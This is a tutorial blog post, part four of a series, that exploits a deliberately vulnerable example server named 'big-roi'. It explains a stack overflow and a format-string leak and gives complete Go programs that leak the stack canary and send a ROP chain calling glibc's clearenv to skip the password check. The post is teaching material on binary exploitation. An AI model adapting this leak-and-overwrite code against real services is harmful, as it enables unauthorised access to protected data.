Leveraging glibc in exploitation - Part 4: An example

In part three, we introduced an example program named “big-roi” and discussed its defenses against binary exploitation. We can finally take everything we learned from the previous posts and build an exploit that leverages glibc.

Putting theory into practice

In the previous part, I introduced a vulnerable example program named “big-roi”, and we examined some of the built-in defenses it possesses against binary exploitation. Now for the fun part - hacking!

The source code for big-roi can be found on GitLab.

To minimize the differences between your environment and my own, I recommend running the pre-compiled executable found within the git repository on an Ubuntu 20.04 system. The executable can be quasi-authenticated by diffing (or hashing) the included objdump disassembly against your own:

# Note: The provided objdump output uses "intel" syntax.
$ objdump -D -M intel big-roi > /tmp/big-roi.objdump.txt
$ diff big-roi.objdump.txt /tmp/big-roi.objdump.txt

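The application takes two arguments: a TCP port to listen on, and a file path to share. The user can optionally set a password by generating a crypt(3)-style password hash and storing it in the PASSWORD_BCRYPT environment variable. (Despite the variable's name, the openssl passwd -5 command used below produces a SHA-256 crypt hash rather than bcrypt; crypt accepts it all the same.) For example: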

# Note: This requires openssl.
# Refer to "man openssl-passwd" for more information.
$ export PASSWORD_BCRYPT=$(openssl passwd -5)
# <Type in a password and confirm it>
$ echo 'keith says to forget about it!' > /tmp/secret-data
$ ./big-roi 6666 /tmp/secret-data

Users can retrieve the file by connecting to the process over TCP and sending a password:

# Note: Make sure to not include a trailing newline character.
$ printf '%s' 'gfy' | nc 127.0.0.1 6666
incorrect password: gfy
$ printf '%s' '<actual password>' | nc 127.0.0.1 6666
keith says to forget about it!

Our goal will be to bypass the program’s password check by leveraging glibc. While this post will focus on the glibc angle, I highly encourage readers to explore other exploitation possibilities with the same security constraints we will be facing here.

Due to the complexity involved in explaining and illustrating a vulnerable program, any example will be at least slightly contrived. The more realistic the example, the more binary exploitation concepts it touches. The main goal of this example is to display something a well-intentioned programmer might implement as an experiment, which unfortunately became the next link in a chain an attacker was chomping on.

Bugs

There are two security bugs in the big-roi example. Feel free to search for them yourself before we discuss them in the next few sections - they are not meant to be difficult to find. The main theme of the bugs is that the developer got a little lazy, and made some unfortunate copy-paste choices and typos.

Outright memory corruption

Starting from the beginning of the source file, the first security bug of interest appears on lines 40 and 55:

void handleClient(int childfd, char *privateFilePath) {
  char buf[102]; /* message buffer (line 40) */
  FILE *socket;
  int privateFd;
  struct stat privateStat;

  socket = fdopen(childfd, "r+b");
  if (socket == 0) {
    printf("failed to fdopen socket fd\n");
    goto done;
  }

  /*
   * read: read input string from the client
   */
  bzero(buf, sizeof(buf));
  if (read(fileno(socket), buf, 1024) < 0) { /* line 55 */
    printf("failed to read from socket\n");
    goto done;
  }

The buf variable is a buffer (a chunk of memory) allocated on the call stack. We know it is allocated on the stack because it is a local variable, and its size (102 bytes) is known at compile time. While there is nothing inherently wrong with allocating a buffer on the stack, line 55 proceeds to read up to 1024 bytes from socket (the connection with a TCP client) into that 102-byte buffer. Perhaps the buffer’s size was a simple typo by the imaginary programmer :)

This is a classic stack-based buffer overflow bug. If you recall from part two of this series, the call stack (or “stack” as it is often called) is where the program stores everything a function needs to execute (such as local variables). It consists of many “stack frames”, and each frame holds the state of one function call that has not yet returned. A frame is identified by a beginning and end address. On an x86 64-bit CPU, this information is stored in two CPU registers:

rsp (the “top” of the stack frame, “sp” meaning “stack pointer”)
rbp (the “bottom” of the stack frame, “bp” meaning “base pointer”)

As the program executes functions, it updates the memory addresses stored in these two registers to point at different slices of the stack. Everything that falls between the addresses found in these registers constitutes the current stack frame.

The stack also stores information about the state of the program. For our part, we are interested in a very specific piece of program state: the saved return instruction pointer. This is a memory address that is used by the program to find its way back to the code that executed the current function. Unbeknownst to the programmer, this piece of information is stored alongside the programmer’s local variables.

When data “overflows” the area allocated for the programmer’s local variables, the overflowing data will eventually overwrite the saved return instruction pointer. When the function returns, the program will restore the corrupted return instruction pointer, resulting in the control flow of the program being subverted.

To be less abstract: a client could connect to big-roi, send more than 102 bytes of data, and overwrite the saved return instruction pointer with a new address. The attacker-controlled address itself is not executable code, but instead points to executable code the attacker would like to run. This can range from code contained in the vulnerable program, to code supplied by the attacker in the buf variable. In this case, we cannot place executable code in buf and execute it directly due to the non-executable call stack (this is discussed in detail in part three).

It should be noted that a stack-based buffer overflow can be utilized in other ways. For example, it can be used to overwrite a variable in a way that permits the hacker to bypass an if condition. Here, we will turn this bug into a control flow manipulation capability.

Information leak

Not far from the stack-based buffer overflow, we can find our next bug on line 63, a format string vulnerability:

if (getenv(BCRYPT_ENV_NAME)) {
  if (strcmp(crypt(buf, getenv(BCRYPT_ENV_NAME)), getenv(BCRYPT_ENV_NAME)) != 0) {
    fprintf(socket, "incorrect password: ");
    fprintf(socket, buf, strlen(buf)); /* line 63: buf is used as the format string */
    goto done;
  }
  printf("authenticated\n");
}

The program checks if the bcrypt password environment variable is set. It then validates the user-supplied password contained in buf against the bcrypt value with crypt. If that fails, the program writes a message back to the TCP client stating that the password was incorrect along with the password the client supplied. Unfortunately, the user-controlled password is supplied to the fprintf format string function as the first argument. This means an attacker can control the format string specifiers passed to fprintf.

Format string vulnerabilities are probably worth a separate blog post due to the capabilities they grant to an attacker. If you are unfamiliar with format string vulnerabilities, the general issue lies in how format string functions work in C.

Imagine the following printf function call:

printf("%s");

While a valid format string specifier is supplied, there is no corresponding argument being passed to printf. In other words, we would normally expect to see:

printf("%s", "foo\n");

One would think a missing argument results in an empty string, a literal “%s”, or a default string (like in Go) being written to stdout. Without going into too much detail, format string functions in C will essentially follow the calling convention of the Application Binary Interface (ABI) for the current processor architecture to find arguments.

On x86 64-bit processors, the calling convention specifies that rdi holds the first argument of a function call, rsi the second, and so on. For printf("%s"), rdi holds the format string itself, so printf will treat whatever value happens to be stored in the rsi CPU register as a pointer and look for a null-terminated string starting at that address. When there are more format specifiers than there are argument-holding CPU registers, the format string function looks to the call stack. The function will read successive values from the stack and use that data as arguments to the corresponding format specifiers.

The calling convention works a little differently on x86 32-bit processors in that CPU registers are not used for storing or pointing to arguments. Instead, arguments are stored on the call stack, and each successive argument is “popped” off the call stack.

The point is that even if you omit format specifier arguments, the format string function will look for corresponding arguments in places where it would ordinarily expect them. Once the format function “runs out of” CPU registers to check, it will access whatever happens to be stored on the call stack.
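To make the lookup order concrete, here is a minimal Go sketch of where each variadic argument would come from for a call shaped like big-roi's fprintf(socket, buf, ...). It assumes the System V AMD64 calling convention and only integer or pointer arguments; the argSource helper and the "stack+N" notation (an offset from the caller's stack pointer at the time of the call) are illustrative names, not part of any real API.

```go
package main

import "fmt"

// argSource describes where the i-th variadic argument of a call like
// fprintf(stream, format, ...) is read from under the System V AMD64
// calling convention. Assumption: integer/pointer arguments only.
func argSource(i int) string {
	// rdi and rsi hold the two fixed arguments (stream and format string),
	// so the variadic arguments start at rdx.
	regs := []string{"rdx", "rcx", "r8", "r9"}
	if i < len(regs) {
		return regs[i]
	}
	// Once the registers are used up, arguments come from the caller's
	// stack, 8 bytes apart.
	return fmt.Sprintf("stack+%d", (i-len(regs))*8)
}

func main() {
	for i := 0; i < 6; i++ {
		fmt.Printf("specifier #%d reads %s\n", i, argSource(i))
	}
}
```

Under these assumptions, only the first four specifiers are satisfied from registers; everything after that is call stack memory.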

Format string functions can also be used to overwrite a process' state in a controlled way, making format string vulnerabilities incredibly devastating. The information leak capability feeds into this by allowing the hacker to discover precisely where important process state resides in memory. Leaked memory addresses can then be supplied to a format string memory overwrite attack, allowing the hacker to overwrite memory in a targeted manner.

Chances are if you find a format string vulnerability, you now have access to both read and write primitives from a single bug. A recent example of this is a format string vulnerability in the wifid daemon in Apple iOS. Initially, the bug was thought to be useful only for denial of service or a limited information leak. The researchers at “ZecOps” found a novel way to abuse Objective-C format string specifiers to overwrite memory, which allowed them to achieve remote code execution. ¹

While we will be focusing on the information leak capability in this post, I highly recommend reading “Exploiting Format String Vulnerabilities” by “scut”, a hacker from the Austrian hacker group Team TESO. ² This paper in particular provides one of the best explanations of format string vulnerabilities I have found so far.

Developing an exploit

There are potentially several ways to exploit big-roi. The method I have in mind will rely on the two bugs we just discussed. First, the format string vulnerability will allow us to leak data from the call stack. This solves two problems for us:

Leaking the call stack canary
Leaking glibc addresses

This will allow us to create a stack-buffer overflow payload that will not trip the canary verification code or accidentally break other important process state. In addition, we can use the glibc addresses contained in the leak to fingerprint glibc. As we discussed in part two, this will allow us to locate helpful glibc functionality without having to worry about ASLR, or having to guess which version of glibc we are dealing with. Another reason for pursuing this is the password cannot be leaked. The program does not possess a copy of the password to begin with because it uses a bcrypt hash to verify the user’s password.

What code should we execute then? Most CTF challenges are set up so we can simply execute “/bin/sh” to get a shell. In fact, there is a neat tool named “one_gadget”, which will search glibc for a block of code that effectively calls execve("/bin/sh", ...) and thereby spawns a shell process. ³ Even if that helped us here, I think there is a more creative way to exploit this program.

Let’s take a look at the authentication code again:

if (getenv(BCRYPT_ENV_NAME)) {
  if (strcmp(crypt(buf, getenv(BCRYPT_ENV_NAME)), getenv(BCRYPT_ENV_NAME)) != 0) {
    fprintf(socket, "incorrect password: ");
    fprintf(socket, buf, strlen(buf));
    goto done;
  }
  printf("authenticated\n");
}

The optional authentication code only executes if the PASSWORD_BCRYPT environment variable is set. The program checks if the environment variable is set each time it authenticates the user. Since the program does not handle the client connection in a separate process, perhaps we can skip this code by unsetting the environment variable?

glibc provides a few functions that accomplish this: unsetenv and clearenv. ⁴ ⁵ Since clearenv requires no arguments, it is the easiest function to integrate into our exploit’s payload.
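The effect we are after can be illustrated with a small Go analogue. This is only a sketch: os.Clearenv stands in for glibc's clearenv, authRequired is a hypothetical stand-in for big-roi's getenv check, and the hash value is a placeholder.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// authRequired mirrors the shape of big-roi's check: the password is only
// verified when the environment variable is present.
func authRequired() bool {
	_, ok := os.LookupEnv("PASSWORD_BCRYPT")
	return ok
}

// demo sets the variable, clears the environment, and reports whether
// authentication would run before and after. It restores the original
// environment before returning.
func demo() (before, after bool) {
	saved := os.Environ()
	defer func() {
		for _, kv := range saved {
			if k, v, ok := strings.Cut(kv, "="); ok {
				os.Setenv(k, v)
			}
		}
	}()

	os.Setenv("PASSWORD_BCRYPT", "placeholder-hash") // hypothetical value
	before = authRequired()
	os.Clearenv() // Go counterpart of glibc's clearenv()
	after = authRequired()
	return before, after
}

func main() {
	before, after := demo()
	fmt.Println("auth required before:", before) // true
	fmt.Println("auth required after: ", after)  // false
}
```

Once the environment is empty, the outer if condition is false and the password comparison never runs, which is the behavior the exploit aims to trigger inside big-roi.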

Leaking call stack data

Let’s start by figuring out how to leak information from the call stack. The format string vulnerability (via fprintf) will make this pretty easy for us. Recall from part two that the layout of call stack memory remains the same across executions of the program. This means the stack layout should remain the same even if the program is running on a different computer.

Before we fire up gdb or run the program, we should try to understand exactly how much memory we can leak. Once we do that, we can conduct a format string attack and compare the output to what we see in gdb when fprintf begins execution.

We know we can supply up to <size-of-buf>/2 format specifiers because each format specifier consists of at least a % followed by one character - thus one format specifier costs two bytes of buf space. The %p format specifier is particularly interesting because it will cause the format string function to read a pointer’s-worth of memory at a time, and then format it as 0x<hex-encoded-value>. These attributes are important for several reasons:

The 0x prefix can be treated as a delimiter, thus allowing us to easily parse the data into an array (more on the nuances of this later)
By reading a pointer’s worth of memory at a time, we are guaranteed to respect the layout of the call stack. While pointer values are not the only data stored on the stack, values stored there must fit in the general purpose registers (on a 64-bit processor this means a pointer is 64 bits or 8 bytes)
Since we can easily parse this data, we can treat each index in the resulting array as an individual element on the call stack
%p is probably the easiest way to ensure we receive the most data per format specifier

While the buf variable is declared as 102 bytes in the source file, in practice the compiler rounds that up to a multiple of the CPU's word size (in this case, that is 64 bits, or 8 bytes). As a result, we actually have 104 bytes to work with. We can determine the maximum number of format specifiers that will fit in the buffer by dividing its length by two (each %p format specifier consumes two bytes). This means we can fit 52 format specifiers in the buffer. The format string function will then leak 52 pointer-sized chunks of memory. This will total to 416 bytes of memory from general CPU registers and the call stack (52 * 8 = 416).
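The arithmetic above can be double-checked with a few lines of Go. This is a small sketch; roundUp is a helper name chosen for illustration.

```go
package main

import "fmt"

// roundUp rounds n up to the next multiple of align.
func roundUp(n, align int) int {
	return (n + align - 1) / align * align
}

func main() {
	const declared = 102 // char buf[102] in the source
	const word = 8       // pointer size on x86 64-bit

	bufLen := roundUp(declared, word) // space actually available for buf
	specifiers := bufLen / 2          // each "%p" costs two bytes
	leaked := specifiers * word       // bytes disclosed by the leak

	fmt.Println(bufLen, specifiers, leaked) // 104 52 416
}
```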

With that in mind, go ahead and start gdb and run the program:

$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ echo 'foobar' > /tmp/secret-data
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data

Before we write automation that takes advantage of those neat %p attributes, we need to get a sense of what fprintf will spit out. This can be done with netcat:

# Here is what six "%p" values look like:
$ echo '%p%p%p%p%p%p' | nc 127.0.0.1 6666
incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
# Where the format  |   |             |   |    |             |         |
# specifiers fall:  |%p |%p           |%p |%p  |%p           |%p       |

As you can see, the format function does not pad each value with zeros. Values that are “zero” are represented with (nil) without a leading 0x. We can work around the latter inconsistency by replacing all instances of it with 0x00. Then we can treat 0x as a delimiter and split the string into an array. This is probably not the most efficient solution, but it is simple and effective.

Here is a simple Go application that does this using only the standard library:

src: cmd/leak/main.go

package main

import (
	"bytes"
	"errors"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenBytes := flag.Int("l", 104, "The length of the buf variable in bytes")

	flag.Parse()

	if flag.NArg() != 1 {
		log.Fatalln("please specify the address to connect to")
	}

	fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)

	output, err := dialAndSendBytes(flag.Arg(0), fmtStr)
	if err != nil {
		log.Fatalf("failed to read all output - %s", err)
	}

	log.Printf("output from vulnerable program: '%s'", output)

	err = stackChunksFromFmtStr(output)
	if err != nil {
		log.Fatalf("failed to parse format string output - %s", err)
	}
}

func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

// Example format string output:
//	incorrect password: 0x110x7fffffffe4b00x14(nil)0x7fffffffe8c60x400000001
func stackChunksFromFmtStr(output []byte) error {
	if len(bytes.TrimSpace(output)) == 0 {
		return errors.New("format string func output is empty")
	}

	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	chunks := bytes.Split(output, []byte("0x"))
	// Start at index 1 to skip "incorrect password: ".
	chunks = chunks[1:]

	for i, chunk := range chunks {
		log.Printf("chunk %d: %s", i, chunk)
	}

	return nil
}

Execute the Go program to leak a portion of the call stack:

$ go run cmd/leak/main.go 127.0.0.1:6666
output from vulnerable program: '<data-omitted-for-brevity>'
chunk 0: 68
# ...
chunk 21: 7ffff7f826a0
chunk 22: f
chunk 23: 55555555a9d0
chunk 24: d68
chunk 25: 7ffff7e29ad1
chunk 26: 7025702570257025
chunk 27: 7025702570257025
chunk 28: 7025702570257025
chunk 29: 7025702570257025
chunk 30: 7025702570257025
chunk 31: 7025702570257025
chunk 32: 7025702570257025
chunk 33: 7025702570257025
chunk 34: 7025702570257025
chunk 35: 7025702570257025
chunk 36: 7025702570257025
chunk 37: 7025702570257025
chunk 38: 7025702570257025
chunk 39: ca9055feff69a500
chunk 40: 5555555553e0
chunk 41: 5555555559d0
chunk 42: 7fffffffe550
chunk 43: 555555555768
chunk 44: 7fffffffe8c6
chunk 45: 400000000
chunk 46: 7fffffffe5d0
chunk 47: 5555555559c6
chunk 48: 7fffffffe6c8
chunk 49: 300000000
chunk 50: 555555554040
chunk 51: 1000f0b5ff

This output tells us where each chunk of call stack memory resides in the Go slice (if you are unfamiliar with Go, think of a slice as an array). We still need to figure out what these chunks are. The first order of concern is locating where the call stack canary and the saved return instruction pointer are. Once we figure that out, we can test our exploit in gdb. Testing in gdb not only allows us to practice without ASLR, but also allows us to troubleshoot our exploit if it fails.

Naturally, there are several ways to figure out where these important values reside. In this scenario, we will use eyeballs along with gdb.

One of the first things you might have noticed is the repeating 7025702570257025 chunks. If you hex decode that chunk, you will find it is a piece of the format string stored in reverse order (p%p%p%p%). This is due to x86 storing byte sequences in little-endian order. We can identify the beginning and end indexes of the buf variable by simply looking for those chunks, which would be indexes 26 and 38, respectively.
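If you would like to verify the decoding yourself, here is a short Go sketch. The decodeChunk helper is an illustrative name; it hex decodes a chunk as printed and also returns the bytes in reverse, which is the order they occupy in memory.

```go
package main

import (
	"encoding/hex"
	"fmt"
)

// decodeChunk hex-decodes a %p chunk (printed most significant byte first)
// and also returns the bytes in the order they sit in memory.
func decodeChunk(chunk string) (printed, inMemory string, err error) {
	raw, err := hex.DecodeString(chunk)
	if err != nil {
		return "", "", err
	}
	rev := make([]byte, len(raw))
	for i, b := range raw {
		rev[len(raw)-1-i] = b
	}
	return string(raw), string(rev), nil
}

func main() {
	printed, inMemory, err := decodeChunk("7025702570257025")
	if err != nil {
		panic(err)
	}
	fmt.Printf("as printed: %q\n", printed)  // "p%p%p%p%"
	fmt.Printf("in memory:  %q\n", inMemory) // "%p%p%p%p"
}
```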

Finding the call stack canary is straightforward because:

It will be placed after the local variables (of which buf is one)
It is 64 bits (8 bytes) in size
Its first byte in memory is usually 0x00, which shows up as a trailing 00 in %p output (refer to part three for more details on this)

Looking at the chunks of memory that appear after buf, there is only one chunk that matches the criteria, which is chunk 39 with the value: ca9055feff69a500 (again, reversed due to x86’s little-endianness). If there were other canary-looking chunks, we could jump into gdb to double-check our assumption - but that is not the case here.
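The eyeballing above could also be automated. The following Go sketch is one possible heuristic, not the method used by the programs in this post: findBufAndCanary is a hypothetical helper that looks for the run of format string chunks and then for the first full-width chunk ending in 00. It would miss a canary whose most significant byte happens to be zero, because %p does not pad its output.

```go
package main

import "fmt"

// findBufAndCanary scans leaked chunks (hex strings without "0x") for the
// format-string chunks and returns the first and last index where they
// appear, plus the index of the first canary-looking chunk after them.
// Any index is -1 when nothing was found.
func findBufAndCanary(chunks []string) (bufStart, bufEnd, canary int) {
	const marker = "7025702570257025" // "%p%p%p%p" as printed by %p
	bufStart, bufEnd, canary = -1, -1, -1
	for i, c := range chunks {
		if c == marker {
			if bufStart == -1 {
				bufStart = i
			}
			bufEnd = i
		}
	}
	if bufEnd == -1 {
		return
	}
	for i := bufEnd + 1; i < len(chunks); i++ {
		c := chunks[i]
		// Heuristic: a full 8-byte value whose lowest byte is 0x00.
		if len(c) == 16 && c[14:] == "00" {
			canary = i
			break
		}
	}
	return
}

func main() {
	// Abbreviated sample: one unrelated chunk, three buf chunks, then the
	// values that follow buf in the leak shown above.
	chunks := []string{
		"7ffff7e29ad1",
		"7025702570257025", "7025702570257025", "7025702570257025",
		"ca9055feff69a500", "5555555553e0", "5555555559d0",
	}
	fmt.Println(findBufAndCanary(chunks)) // 1 3 4
}
```

Run against the full 52-chunk leak, the same logic should report indexes 26, 38, and 39.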

The saved return instruction pointer is a bit trickier. To be completely honest, I expected only one chunk of memory between the canary and the saved return instruction pointer, which should be the previous stack frame’s base pointer. The saved return instruction pointer should follow after the saved base pointer. My expectation is based on various blog posts I have read. ⁶ ⁷ ⁸ In this case there are two chunks of memory that appear between the canary and the saved base pointer. I am not sure why this is, and I could not find any immediately obvious explanations for this behavior.

We can use gdb to help us find the saved return instruction pointer by pausing the program’s execution with ctrl+c. The info symbol command can then be used to trial and error our way to victory. This debugger command attempts to find a symbol (such as a function name) associated with a memory address. We can simply plug in the addresses that trail buf and look for one associated with the calling function (notifyNewClient):

^C
Program received signal SIGINT, Interrupt.
0x00007ffff7eb9237 in __libc_accept (fd=3, addr=..., len=0x7fffffffe57c) at ../sysdeps/unix/sysv/linux/accept.c:26
26	in ../sysdeps/unix/sysv/linux/accept.c
# Chunk 40:
(gdb) info symbol 0x5555555553e0
_start in section .text of /tmp/big-roi
# Chunk 41:
(gdb) info symbol 0x5555555559d0
__libc_csu_init in section .text of /tmp/big-roi
# Chunk 42:
(gdb) info symbol 0x7fffffffe550
No symbol matches 0x7fffffffe550.
# And chunk 43 is our winner!
(gdb) info symbol 0x555555555768
notifyNewClient + 48 in section .text of /tmp/big-roi

Fantastic - chunk index 43 contains the saved return instruction pointer.

Exploiting the buffer overflow

Now that we know how to programmatically retrieve and reference the call stack canary and other important memory chunks, we can build a new Go slice variable containing our exploit payload. The slice can then be “serialized” into bytes, which will overwrite the process' call stack state when we write it to big-roi via TCP.

The final binary exploitation concept we need to discuss before exploiting big-roi is return-oriented programming (ROP). ROP will allow us to subvert control flow to clearenv, and then back to the original calling function. Like format string attacks, ROP has its own nuances and strategies that could fill a dedicated blog post. Full disclosure: I will simplify how ROP works here to keep things relatively concise and readable.

The “return” in ROP refers to the behavior of the ret CPU instruction which looks up the saved return instruction pointer and jumps execution back to that address. The ret instruction accomplishes this by popping a pointer’s-worth of memory off the top of the call stack. It assumes that this chunk of memory is the saved return instruction pointer and jumps execution to whatever it points at. After the pop occurs, the stack pointer will be pointing at whatever happens to be next on the call stack. ⁹ This allows a hacker to execute code of their choosing by placing a sequence of return addresses on the stack.

A collection of CPU instructions that concludes with the ret instruction is known as a “ROP gadget”. A hacker can change the control flow of a process by strategically placing the addresses of ROP gadgets on the stack. Upon finishing execution, each gadget executes the next gadget simply by executing its ret. This is known as a “ROP chain”. Using ROP to execute code in glibc is sometimes referred to as “ret2libc”.

In our case, we will implement a very basic ROP chain consisting of two gadgets: the clearenv function, and the original saved return instruction pointer. When clearenv finishes executing, its ret will jump to the original saved return instruction pointer that we strategically placed on the call stack. This will return us to the original calling function (notifyNewClient), which will then return back to the main function. Not only will this execute clearenv, but it will also guarantee that the process keeps running by resuming the original control flow.
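As a toy model of this chain, the Go sketch below treats the stack as a slice and each ret as a pop. It deliberately ignores everything a real CPU does between the two returns; runChain is an illustrative name, and the addresses are the ones observed in the gdb session in this post.

```go
package main

import "fmt"

// runChain models a sequence of ret instructions on a toy stack: each ret
// pops the value at the stack pointer and jumps to it.
func runChain(stack []uint64) []uint64 {
	var visited []uint64
	for sp := 0; sp < len(stack); sp++ {
		rip := stack[sp] // ret: pop the next address into rip
		visited = append(visited, rip)
	}
	return visited
}

func main() {
	// Stack contents starting at the overwritten saved return instruction
	// pointer.
	stack := []uint64{
		0x7ffff7ddf830, // clearenv
		0x555555555768, // notifyNewClient+48, the original return address
	}
	for i, rip := range runChain(stack) {
		fmt.Printf("ret #%d jumps to %#x\n", i+1, rip)
	}
}
```

The first ret belongs to handleClient and lands in clearenv; the second is clearenv's own ret, which resumes notifyNewClient.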

We can test our exploit in gdb. That way we can defer fingerprinting glibc and explore ROP. To find a function’s address in gdb, we can use either of the following commands:

(gdb) info address clearenv
Symbol "clearenv" is at 0x7ffff7ddf830 in a file compiled without debugging.
(gdb) p &clearenv
$1 = (int (*)(void)) 0x7ffff7ddf830 <__clearenv>

Now that we know more about the call stack structure, here is what our exploit payload will look like:

+--------------------------------+
| 104 bytes to fill buf variable |
+--------------------------------+
| leaked call stack canary       |
+--------------------------------+
| leaked memory chunk 1          |
+--------------------------------+
| leaked memory chunk 2          |
+--------------------------------+
| leaked saved base pointer      |
+--------------------------------+
| address of the clearenv        |
| function in glibc              |
+--------------------------------+
| original saved return          |
| instruction pointer to         |
| notifyNewClient function       |
+--------------------------------+

As we discussed earlier, x86 stores data in memory in little-endian order. The %p format specifier prints each value as a number, most significant digit first, which is the reverse of how its bytes are laid out in memory. Because of this, we need to reverse the byte order of any chunks of memory that fprintf spits out before we send them back to big-roi. Failing to do so will create invalid memory addresses and will cause big-roi to crash.
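Here is a compact Go sketch of the payload layout and the byte-order conversion, using encoding/binary from the standard library. The packLE and buildPayload helpers are illustrative names, and the values are the ones leaked in the gdb session above; a real run would substitute freshly leaked values.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"strconv"
	"strings"
)

// packLE parses a hex value as printed by %p (with or without "0x") and
// returns its 8-byte little-endian encoding, i.e. its in-memory layout.
func packLE(hexValue string) ([]byte, error) {
	v, err := strconv.ParseUint(strings.TrimPrefix(hexValue, "0x"), 16, 64)
	if err != nil {
		return nil, err
	}
	out := make([]byte, 8)
	binary.LittleEndian.PutUint64(out, v)
	return out, nil
}

// buildPayload lays out the overflow: filler bytes for buf, followed by
// each value in the order it should appear on the stack.
func buildPayload(bufLen int, values ...string) ([]byte, error) {
	payload := bytes.Repeat([]byte{0x41}, bufLen)
	for _, v := range values {
		b, err := packLE(v)
		if err != nil {
			return nil, fmt.Errorf("bad value %q: %w", v, err)
		}
		payload = append(payload, b...)
	}
	return payload, nil
}

func main() {
	payload, err := buildPayload(104,
		"ca9055feff69a500", // call stack canary
		"5555555553e0",     // leaked memory chunk 1
		"5555555559d0",     // leaked memory chunk 2
		"7fffffffe550",     // saved base pointer
		"7ffff7ddf830",     // clearenv (address seen in gdb)
		"555555555768",     // original saved return instruction pointer
	)
	if err != nil {
		panic(err)
	}
	fmt.Println(len(payload))                       // 152
	fmt.Printf("%x\n", payload[len(payload)-16:]) // 30f8ddf7ff7f00006857555555550000
}
```

With these numbers the saved return instruction pointer sits 136 bytes into the payload (104 + 8 + 3 * 8), which is where the clearenv address lands.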

We can adapt the Go program from earlier to create a new slice containing the exploit payload from above, and then re-connect to get the contents of the secret file. That is what I have done here:

src: cmd/exploit/main.go

package main

import (
	"bytes"
	"encoding/hex"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
)

func main() {
	log.SetFlags(0)

	bufLenBytes := flag.Int(
		"l",
		104,
		"The length of the buf variable in bytes")
	csCanaryIndex := flag.Int(
		"c",
		39,
		"The index of the call stack canary in the format string output")
	numChunksUntilRIP := flag.Int(
		"r",
		3,
		"The number of memory chunks between the canary and RIP")

	flag.Parse()

	if flag.NArg() != 2 {
		log.Fatalln("please specify the address to connect to and the address of clearenv")
	}

	flag.VisitAll(func(f *flag.Flag) {
		if f.Value.String() == "" || f.Value.String() == "0" {
			log.Fatalf("please specify '-%s' - %s", f.Name, f.Usage)
		}
	})

	serverAddr := flag.Arg(0)
	clearenvAddr := fmtOutputToBytesOrExit([]byte(flag.Arg(1)))
	fmtStr := bytes.Repeat([]byte("%p"), *bufLenBytes/2)

	output, err := dialAndSendBytes(serverAddr, fmtStr)
	if err != nil {
		log.Fatalf("failed to send initial payload - %s", err)
	}

	output = bytes.ReplaceAll(output, []byte("(nil)"), []byte("0x00"))
	memoryChunks := bytes.Split(output, []byte("0x"))
	// Start at index 1 to skip "incorrect password: ".
	memoryChunks = memoryChunks[1:]

	log.Printf("initial output from vulnerable program: '%s'", output)

	exploitPayload := bytes.Repeat([]byte{0x41}, *bufLenBytes)

	csCanary := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex])
	log.Printf("call stack canary: '0x%x'", csCanary)
	exploitPayload = append(exploitPayload, wrongEndian(csCanary)...)

	for i := 0; i < *numChunksUntilRIP; i++ {
		garbage := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+i+1])
		log.Printf("preserving chunk: '0x%x'", garbage)
		exploitPayload = append(exploitPayload, wrongEndian(garbage)...)
	}

	rip := fmtOutputToBytesOrExit(memoryChunks[*csCanaryIndex+*numChunksUntilRIP+1])
	log.Printf("existing return instruction pointer: '0x%x'", rip)

	exploitPayload = append(exploitPayload, wrongEndian(clearenvAddr)...)
	log.Printf("clearenv address: '0x%x'", clearenvAddr)

	exploitPayload = append(exploitPayload, wrongEndian(rip)...)

	log.Printf("sending payload: 0x%x", exploitPayload)
	_, err = dialAndSendBytes(serverAddr, exploitPayload)
	if err != nil {
		log.Fatalf("failed to send exploit payload - %s", err)
	}

	log.Println("getting secret file contents...")
	fileContents, err := dialAndSendBytes(serverAddr, []byte("\n"))
	if err != nil {
		log.Fatalf("failed to get file contents - %s", err)
	}

	log.Printf("secret file contents: '%s'", fileContents)
}

func dialAndSendBytes(serverAddr string, b []byte) ([]byte, error) {
	conn, err := net.Dial("tcp", serverAddr)
	if err != nil {
		return nil, fmt.Errorf("failed to dial - %w", err)
	}
	defer conn.Close()

	_, err = conn.Write(b)
	if err != nil {
		return nil, fmt.Errorf("failed to write data - %w", err)
	}

	output, err := io.ReadAll(conn)
	if err != nil {
		return nil, fmt.Errorf("failed to read all output - %w", err)
	}

	return output, nil
}

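// fmtOutputToBytesOrExit converts one %p chunk (hex digits, optionally
// prefixed with "0x") into bytes in printed (big-endian) order, left-padded
// with zeros to 8 bytes. It exits the program if the chunk cannot be decoded.
func fmtOutputToBytesOrExit(b []byte) []byte {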
	var tmp []byte
	for i := range b {
		// Only include hex characters (0-9, A-F, a-f).
		if (b[i] >= '0' && b[i] <= '9') || (b[i] >= 'A' && b[i] <= 'F') || (b[i] >= 'a' && b[i] <= 'f') {
			tmp = append(tmp, b[i])
		}
	}

	tmpStr := string(tmp)
	if len(tmp)%2 != 0 {
		tmpStr = "0" + tmpStr
	}

	addr, err := hex.DecodeString(tmpStr)
	if err != nil {
		log.Fatalf("failed to hex decode '%s' - %s", b, err)
	}

	finalAddr := make([]byte, 8)
	if len(addr) < 8 {
		copy(finalAddr[8-len(addr):], addr)
	} else {
		finalAddr = addr
	}

	return finalAddr
}

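// wrongEndian returns the first 8 bytes of src in reverse order, converting
// a value from printed (big-endian) order to x86's little-endian layout.
func wrongEndian(src []byte) []byte {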
	dst := make([]byte, 8)
	for i := 0; i < 8; i++ {
		dst[8-1-i] = src[i]
	}
	return dst
}

